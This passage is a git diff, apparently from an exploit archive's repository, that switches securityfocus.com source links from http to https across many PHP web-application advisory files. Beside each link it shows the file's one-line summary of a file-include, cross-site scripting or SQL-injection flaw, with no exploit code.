in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28024.txt b/exploits/php/webapps/28024.txt index 3990ca2f8..b7209a9a5 100644 --- a/exploits/php/webapps/28024.txt +++ b/exploits/php/webapps/28024.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18432/info +source: https://www.securityfocus.com/bid/18432/info The bbrss plugin for PhpBB is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/28025.txt b/exploits/php/webapps/28025.txt index 86a8b07c8..d06bdb8fa 100644 --- a/exploits/php/webapps/28025.txt +++ b/exploits/php/webapps/28025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18435/info +source: https://www.securityfocus.com/bid/18435/info RahnemaCo is prone to a remote file-include vulnerability. 
diff --git a/exploits/php/webapps/28027.txt b/exploits/php/webapps/28027.txt index 1f1bb553b..9344f1a1f 100644 --- a/exploits/php/webapps/28027.txt +++ b/exploits/php/webapps/28027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18441/info +source: https://www.securityfocus.com/bid/18441/info ISPConfig is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28028.txt b/exploits/php/webapps/28028.txt index cffa6db73..a6a4eadae 100644 --- a/exploits/php/webapps/28028.txt +++ b/exploits/php/webapps/28028.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18444/info +source: https://www.securityfocus.com/bid/18444/info vBulletin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28031.txt b/exploits/php/webapps/28031.txt index 837ea2898..23367f3d8 100644 --- a/exploits/php/webapps/28031.txt +++ b/exploits/php/webapps/28031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18454/info +source: https://www.securityfocus.com/bid/18454/info HotPlug CMS is prone to a cross-site scripting attack. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28032.txt b/exploits/php/webapps/28032.txt index d41200772..3a35f4337 100644 --- a/exploits/php/webapps/28032.txt +++ b/exploits/php/webapps/28032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18470/info +source: https://www.securityfocus.com/bid/18470/info MPCS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28033.txt b/exploits/php/webapps/28033.txt index 6f91f9163..523d6d67a 100644 --- a/exploits/php/webapps/28033.txt 
+++ b/exploits/php/webapps/28033.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18472/info +source: https://www.securityfocus.com/bid/18472/info VBZooM is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28034.txt b/exploits/php/webapps/28034.txt index da6fec28d..3a7f762ed 100644 --- a/exploits/php/webapps/28034.txt +++ b/exploits/php/webapps/28034.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18474/info +source: https://www.securityfocus.com/bid/18474/info Ji-takz is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28035.txt b/exploits/php/webapps/28035.txt index e7f6e23b6..ecee1678b 100644 --- a/exploits/php/webapps/28035.txt +++ b/exploits/php/webapps/28035.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18476/info +source: https://www.securityfocus.com/bid/18476/info mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28036.txt b/exploits/php/webapps/28036.txt index aa773f7d5..a99dd6562 100644 --- a/exploits/php/webapps/28036.txt +++ b/exploits/php/webapps/28036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18476/info +source: https://www.securityfocus.com/bid/18476/info mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28037.txt b/exploits/php/webapps/28037.txt index 5329ead24..a483cb678 100644 --- a/exploits/php/webapps/28037.txt +++ b/exploits/php/webapps/28037.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18476/info +source: https://www.securityfocus.com/bid/18476/info mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28038.txt b/exploits/php/webapps/28038.txt index 7efa3020b..a5f0b3e22 100644 --- a/exploits/php/webapps/28038.txt +++ b/exploits/php/webapps/28038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18477/info +source: https://www.securityfocus.com/bid/18477/info Indexu is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28039.txt b/exploits/php/webapps/28039.txt index 1cc3b4005..fb18ba6d6 100644 --- a/exploits/php/webapps/28039.txt +++ b/exploits/php/webapps/28039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28040.txt b/exploits/php/webapps/28040.txt index f8d77ec66..0637c5799 100644 --- a/exploits/php/webapps/28040.txt +++ b/exploits/php/webapps/28040.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28041.txt b/exploits/php/webapps/28041.txt index 45ca9d59b..bd261f335 100644 --- a/exploits/php/webapps/28041.txt +++ b/exploits/php/webapps/28041.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28042.txt b/exploits/php/webapps/28042.txt index 6c7e9ed01..9b4259dba 100644 --- a/exploits/php/webapps/28042.txt +++ b/exploits/php/webapps/28042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28043.txt b/exploits/php/webapps/28043.txt index 49fbd7f0f..caf3ea080 100644 --- a/exploits/php/webapps/28043.txt +++ b/exploits/php/webapps/28043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28045.txt b/exploits/php/webapps/28045.txt index dcd9c7e09..c5366a923 100644 --- a/exploits/php/webapps/28045.txt +++ b/exploits/php/webapps/28045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28046.txt b/exploits/php/webapps/28046.txt index 9e2cf2c3e..7ec1af917 100644 --- a/exploits/php/webapps/28046.txt +++ b/exploits/php/webapps/28046.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18479/info +source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28047.txt b/exploits/php/webapps/28047.txt index 8952453d7..7473e380b 100644 --- a/exploits/php/webapps/28047.txt +++ b/exploits/php/webapps/28047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18489/info +source: https://www.securityfocus.com/bid/18489/info CMS Faethon is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28048.txt b/exploits/php/webapps/28048.txt index 7d9f43445..eef7a67fe 100644 --- a/exploits/php/webapps/28048.txt +++ b/exploits/php/webapps/28048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18490/info +source: https://www.securityfocus.com/bid/18490/info RahnemaCo is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/28057.txt b/exploits/php/webapps/28057.txt index 338a1eafb..6011902e2 100644 --- a/exploits/php/webapps/28057.txt +++ b/exploits/php/webapps/28057.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18491/info +source: https://www.securityfocus.com/bid/18491/info Cline Communications is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28058.txt b/exploits/php/webapps/28058.txt index dbb68eda2..56242b714 100644 --- a/exploits/php/webapps/28058.txt +++ b/exploits/php/webapps/28058.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18499/info +source: https://www.securityfocus.com/bid/18499/info Eduha Meeting is prone to an arbitrary file-upload vulnerability. diff --git a/exploits/php/webapps/28059.txt b/exploits/php/webapps/28059.txt index d8019a5a2..aac4fc059 100644 --- a/exploits/php/webapps/28059.txt +++ b/exploits/php/webapps/28059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18501/info +source: https://www.securityfocus.com/bid/18501/info The saphplesson module is prone to multiple SQL-injection vulnerabilities because the fails application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28060.txt b/exploits/php/webapps/28060.txt index 6768733dc..06fe615b9 100644 --- a/exploits/php/webapps/28060.txt +++ b/exploits/php/webapps/28060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18502/info +source: https://www.securityfocus.com/bid/18502/info Datecomm is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28063.txt b/exploits/php/webapps/28063.txt index 3ba3acf13..095836e83 100644 --- a/exploits/php/webapps/28063.txt +++ b/exploits/php/webapps/28063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18508/info +source: https://www.securityfocus.com/bid/18508/info e107 is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28064.txt b/exploits/php/webapps/28064.txt index 32e778aa1..f9e3a132c 100644 --- a/exploits/php/webapps/28064.txt +++ b/exploits/php/webapps/28064.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18510/info +source: https://www.securityfocus.com/bid/18510/info Qto file manager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28066.txt b/exploits/php/webapps/28066.txt index 9e07f045e..d08e13aae 100644 --- a/exploits/php/webapps/28066.txt +++ b/exploits/php/webapps/28066.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18518/info +source: https://www.securityfocus.com/bid/18518/info singapore gallery is prone to directory-traversal and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28067.txt b/exploits/php/webapps/28067.txt index ea7814eaf..8de5c629f 100644 --- a/exploits/php/webapps/28067.txt +++ b/exploits/php/webapps/28067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18518/info +source: https://www.securityfocus.com/bid/18518/info singapore gallery is prone to directory-traversal and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28068.txt b/exploits/php/webapps/28068.txt index 1c33b6e6b..bd1f4a09f 100644 --- a/exploits/php/webapps/28068.txt +++ b/exploits/php/webapps/28068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28069.txt b/exploits/php/webapps/28069.txt index c30d1f283..864cb5805 100644 --- a/exploits/php/webapps/28069.txt +++ b/exploits/php/webapps/28069.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28070.txt b/exploits/php/webapps/28070.txt index 2ce49f18c..e1cf11897 100644 --- a/exploits/php/webapps/28070.txt +++ b/exploits/php/webapps/28070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28071.txt b/exploits/php/webapps/28071.txt index f791fc7ac..24ae0c0bb 100644 --- a/exploits/php/webapps/28071.txt +++ b/exploits/php/webapps/28071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28072.txt b/exploits/php/webapps/28072.txt index a3726eb6e..851c0b793 100644 --- a/exploits/php/webapps/28072.txt +++ b/exploits/php/webapps/28072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28073.txt b/exploits/php/webapps/28073.txt index 938e2e343..9b4b3e9b6 100644 --- a/exploits/php/webapps/28073.txt 
+++ b/exploits/php/webapps/28073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28074.txt b/exploits/php/webapps/28074.txt index f68eb461d..8a8656a35 100644 --- a/exploits/php/webapps/28074.txt +++ b/exploits/php/webapps/28074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28075.txt b/exploits/php/webapps/28075.txt index 1fcade749..b605463fa 100644 --- a/exploits/php/webapps/28075.txt +++ b/exploits/php/webapps/28075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18543/info +source: https://www.securityfocus.com/bid/18543/info V3 Chat Instant Messenger is prone to multiple cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28076.txt b/exploits/php/webapps/28076.txt index 4497dcb25..4fc4dfc23 100644 --- a/exploits/php/webapps/28076.txt +++ b/exploits/php/webapps/28076.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18551/info +source: https://www.securityfocus.com/bid/18551/info Vbulletin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28078.txt b/exploits/php/webapps/28078.txt index fda6a3100..9616c74b5 100644 --- a/exploits/php/webapps/28078.txt 
+++ b/exploits/php/webapps/28078.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18560/info +source: https://www.securityfocus.com/bid/18560/info The e107 CMS is prone to an HTML-injection vulnerability. diff --git a/exploits/php/webapps/28088.txt b/exploits/php/webapps/28088.txt index 6144d0c64..6c176efb2 100644 --- a/exploits/php/webapps/28088.txt +++ b/exploits/php/webapps/28088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18593/info +source: https://www.securityfocus.com/bid/18593/info PHP Event Calendar is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28089.txt b/exploits/php/webapps/28089.txt index 2eb964183..fb4e7d6fc 100644 --- a/exploits/php/webapps/28089.txt +++ b/exploits/php/webapps/28089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18597/info +source: https://www.securityfocus.com/bid/18597/info WoltLab Burning Board is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28090.txt b/exploits/php/webapps/28090.txt index 9995c571d..5cb89fecc 100644 --- a/exploits/php/webapps/28090.txt +++ b/exploits/php/webapps/28090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18597/info +source: https://www.securityfocus.com/bid/18597/info WoltLab Burning Board is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28091.txt b/exploits/php/webapps/28091.txt index a5714d4e8..7f7c668ad 100644 --- a/exploits/php/webapps/28091.txt +++ b/exploits/php/webapps/28091.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18597/info +source: https://www.securityfocus.com/bid/18597/info WoltLab Burning Board is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28092.txt b/exploits/php/webapps/28092.txt index 26023b6a2..624d224c8 100644 --- a/exploits/php/webapps/28092.txt +++ b/exploits/php/webapps/28092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18602/info +source: https://www.securityfocus.com/bid/18602/info MyBulletinBoard is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28093.txt b/exploits/php/webapps/28093.txt index b521e08ef..c457a223b 100644 --- a/exploits/php/webapps/28093.txt +++ b/exploits/php/webapps/28093.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18605/info +source: https://www.securityfocus.com/bid/18605/info Softbiz Dating Script is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28094.txt b/exploits/php/webapps/28094.txt index b21617482..5b9bfc1c8 100644 --- a/exploits/php/webapps/28094.txt +++ b/exploits/php/webapps/28094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18605/info +source: https://www.securityfocus.com/bid/18605/info Softbiz Dating Script is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28095.txt b/exploits/php/webapps/28095.txt index c7cfffd54..6b4bd4870 100644 --- a/exploits/php/webapps/28095.txt +++ b/exploits/php/webapps/28095.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18605/info +source: https://www.securityfocus.com/bid/18605/info Softbiz Dating Script is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28096.txt b/exploits/php/webapps/28096.txt index 205ca7aec..b187b32ec 100644 --- a/exploits/php/webapps/28096.txt +++ b/exploits/php/webapps/28096.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18605/info +source: https://www.securityfocus.com/bid/18605/info Softbiz Dating Script is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28097.txt b/exploits/php/webapps/28097.txt index 81f6cf4e6..b9dde8278 100644 --- a/exploits/php/webapps/28097.txt +++ b/exploits/php/webapps/28097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18607/info +source: https://www.securityfocus.com/bid/18607/info Dating Agent is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28098.txt b/exploits/php/webapps/28098.txt index b371920cc..410bb11ae 100644 --- a/exploits/php/webapps/28098.txt +++ b/exploits/php/webapps/28098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18609/info +source: https://www.securityfocus.com/bid/18609/info PHP Blue Dragon CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28101.txt b/exploits/php/webapps/28101.txt index 6a3d69b0e..dee50ad78 100644 --- a/exploits/php/webapps/28101.txt +++ b/exploits/php/webapps/28101.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18626/info +source: https://www.securityfocus.com/bid/18626/info Custom Dating Biz is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/28102.txt b/exploits/php/webapps/28102.txt index c547ad042..221b2b4a2 100644 --- a/exploits/php/webapps/28102.txt +++ b/exploits/php/webapps/28102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18629/info +source: https://www.securityfocus.com/bid/18629/info Winged Gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28104.txt b/exploits/php/webapps/28104.txt index 4e84a65eb..c65b873aa 100644 --- a/exploits/php/webapps/28104.txt +++ b/exploits/php/webapps/28104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18638/info +source: https://www.securityfocus.com/bid/18638/info ADOdb is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28105.txt b/exploits/php/webapps/28105.txt index 28f7324fa..e538175a6 100644 --- a/exploits/php/webapps/28105.txt +++ b/exploits/php/webapps/28105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18649/info +source: https://www.securityfocus.com/bid/18649/info eNpaper1 is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28106.txt b/exploits/php/webapps/28106.txt index 654dc5667..64fcf98e2 100644 --- a/exploits/php/webapps/28106.txt +++ b/exploits/php/webapps/28106.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18654/info +source: https://www.securityfocus.com/bid/18654/info Bee-hive is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28107.txt b/exploits/php/webapps/28107.txt index 1caf70ff0..34dfc26a2 100644 --- a/exploits/php/webapps/28107.txt +++ b/exploits/php/webapps/28107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18655/info +source: https://www.securityfocus.com/bid/18655/info Cpanel is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28108.txt b/exploits/php/webapps/28108.txt index 564f91b58..d24623b85 100644 --- a/exploits/php/webapps/28108.txt +++ b/exploits/php/webapps/28108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18656/info +source: https://www.securityfocus.com/bid/18656/info MyMail is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28109.txt b/exploits/php/webapps/28109.txt index b215c54e7..2c0631caf 100644 --- a/exploits/php/webapps/28109.txt +++ b/exploits/php/webapps/28109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18662/info +source: https://www.securityfocus.com/bid/18662/info Usenet is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28110.txt b/exploits/php/webapps/28110.txt index 453dfc85d..321121038 100644 --- a/exploits/php/webapps/28110.txt +++ b/exploits/php/webapps/28110.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18663/info +source: https://www.securityfocus.com/bid/18663/info mvnForum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28111.txt b/exploits/php/webapps/28111.txt index e3ee6ef66..f73e7f7dd 100644 --- a/exploits/php/webapps/28111.txt +++ b/exploits/php/webapps/28111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18666/info +source: https://www.securityfocus.com/bid/18666/info OpenGuestbook is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28112.txt b/exploits/php/webapps/28112.txt index 50975a27c..6adc94c82 100644 --- a/exploits/php/webapps/28112.txt +++ b/exploits/php/webapps/28112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18666/info +source: https://www.securityfocus.com/bid/18666/info OpenGuestbook is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28113.txt b/exploits/php/webapps/28113.txt index 1f864da61..940aff0d6 100644 --- a/exploits/php/webapps/28113.txt +++ b/exploits/php/webapps/28113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18671/info +source: https://www.securityfocus.com/bid/18671/info cPanel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28114.txt b/exploits/php/webapps/28114.txt index ffc105cb6..1dc4c518c 100644 --- a/exploits/php/webapps/28114.txt +++ b/exploits/php/webapps/28114.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18674/info +source: https://www.securityfocus.com/bid/18674/info CrisoftRicette is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28115.txt b/exploits/php/webapps/28115.txt index 8ec1d9bc9..853941db3 100644 --- a/exploits/php/webapps/28115.txt +++ b/exploits/php/webapps/28115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18676/info +source: https://www.securityfocus.com/bid/18676/info MF Piadas is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28117.txt b/exploits/php/webapps/28117.txt index 34401e965..2e5f7c8d4 100644 --- a/exploits/php/webapps/28117.txt +++ b/exploits/php/webapps/28117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18679/info +source: https://www.securityfocus.com/bid/18679/info MF Piadas is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28119.txt b/exploits/php/webapps/28119.txt index 3e2be1415..b7c78b5d9 100644 --- a/exploits/php/webapps/28119.txt +++ b/exploits/php/webapps/28119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18699/info +source: https://www.securityfocus.com/bid/18699/info VCard PRO is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28120.txt b/exploits/php/webapps/28120.txt index 19a1d2e91..0ab4df1c0 100644 --- a/exploits/php/webapps/28120.txt +++ b/exploits/php/webapps/28120.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18699/info +source: https://www.securityfocus.com/bid/18699/info VCard PRO is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28121.txt b/exploits/php/webapps/28121.txt index 881ed9cc2..a7fa632f6 100644 --- a/exploits/php/webapps/28121.txt +++ b/exploits/php/webapps/28121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18699/info +source: https://www.securityfocus.com/bid/18699/info VCard PRO is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28122.txt b/exploits/php/webapps/28122.txt index eb35ddcd5..387863247 100644 --- a/exploits/php/webapps/28122.txt +++ b/exploits/php/webapps/28122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18699/info +source: https://www.securityfocus.com/bid/18699/info VCard PRO is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28124.pl b/exploits/php/webapps/28124.pl index b3be3eef4..d98136ccf 100755 --- a/exploits/php/webapps/28124.pl +++ b/exploits/php/webapps/28124.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18707/info +source: https://www.securityfocus.com/bid/18707/info MKPortal is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28125.txt b/exploits/php/webapps/28125.txt index cebbb2033..3f63025b4 100644 --- a/exploits/php/webapps/28125.txt +++ b/exploits/php/webapps/28125.txt 
